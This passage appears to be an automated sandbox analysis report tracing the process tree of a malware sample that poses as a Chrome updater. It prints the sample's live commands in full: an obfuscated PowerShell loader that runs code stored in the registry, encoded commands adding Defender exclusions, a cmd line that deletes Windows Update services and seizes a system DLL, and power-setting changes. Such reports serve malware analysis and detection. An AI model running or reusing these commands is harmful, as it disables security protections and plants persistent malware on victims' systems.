PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 3060	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	conhost.exe
PID 4948 wrote to memory of 4192	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 4948 wrote to memory of 4192	4948	16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe	powershell.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 3856 wrote to memory of 2500	3856	powershell.EXE	dllhost.exe
PID 212 wrote to memory of 1848	212	cmd.exe	reg.exe
PID 212 wrote to memory of 1848	212	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:660

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:600

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1008

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{70ee3c05-9b85-43e0-b203-6f15f48c5757}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{426c058d-46e0-41b6-8f7d-ffa63b0d6b95}
2⤵
PID:2320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1160

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAdwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB0ACMAPgA="
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1796

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:2832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:4660

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:2356

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3948

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:5032

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:3012

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:4872

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1156

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:2156

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:1516

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:4880

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3672

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4920

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:5004

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4820

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2780

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1236

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:2236

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:2136

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:3728

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:4968

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1652

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:4536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:4340

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of SetWindowsHookEx
PID:3924

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:504

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:3280

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:2416

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:4412

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "fotenqffsdg"
4⤵
PID:1240

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeuUnLsXDD9UtB3flETOPTJSsx1RTbkWA+xUUHWbk5tS/88kiBjzOWROcItZCa19YzWwG294PvSGFl3hPGA5ZbwU+pcVLBqbqLOnV4zWU4lY2wH0ZELAHdkWrYk+7ENXoQziO22V6ckhOxPyaVs82YN/9a3ifTAItYOFArt4U3K6bB7F90lVvq7QwQhNo6tEAC6/qeiMZE1q08X0nwcXGWB+0u4suIL4Z4DCAa054zZutth0rng4GR/dXCbKfw/lYkNtdAcXMzX35twOSggH5Co4UwheW366ng+FuqhYrupWviHg3nrTWKYKFV/Z9VkRc5QPFZo8S1u8KUaN/9+FCfaV9FnY0PiGQClhwUH1x4ZHMgCHvbtTfAQZnZ6PHdhTedfzPc/1b6jDZTt2gLFGVUTpdjtbd0A7HbKxciS2G9ds3BAn0dJexxAf2Br8df8B/KEwKMJ+loEE6uuE26u2HGWPzuqaI7RLAlHRh9CoJI1+I=
4⤵
PID:4932

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu1 XofLACsdV31j9ZQMDeZoqCpNDgH0IbRDCo8NYw9+P4ISyhmBaEKZj/pCrFzqeglJuGJVePitxQ1seLOAXl7jWWqXK+zOrqa2LmfHXb1cPkhd1J50U99RQ61Gyog4XK27/XTKo0f9OmcXDDPP9C48Ue7GZsz87KETDZ5qD/Yaq1lB35GEx/fRQAGrjdVEa0u7JPhfVtNRFtP1XBlwVUEgxsufEEfeQMI5wTmbbTssPqyRBa9iiWu+72oSNhkbSwWZcuQ2UAgyeaUjxbtJ0D2znd9Y++tdpAWuo5aLo0IzHXZhNVbYmhUQJYD+wnHENe+14/exahTwHPq/jdb503ZCEWJvf3Rvhi52ecxgli8y+ICndzv7ONBqBKvBj1Mu1X47SAlkpCck5/xJqFvaPG5cIq3h/y80diKSbPokVDWnEa/rMyTVTPRzyu+sagweTAfH7BqvN6UeRhHhphz3iAeobA==
4⤵
PID:4900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2472

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3388

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3388 -s 732
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2076

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3516

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 484 -p 3388 -ip 3388
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:328

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3280 -ip 3280
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:992

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:2744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4736

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3280

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3280 -s 952
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3080

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2520

C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe
"C:\Users\Admin\AppData\Local\Temp\16691a026002980c1fac428610d73ca9638420d2e3fa79c8d1a8284388ee307b.exe"
2⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:224

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:3488

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:3692

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:4732

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3716

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:5024

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:2836

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:2100

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:328

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:4632

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:5056

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1064

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1848

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4160

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1108

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1772

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2184

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:4300

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4868

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:3008

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2456

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:2192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:3060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
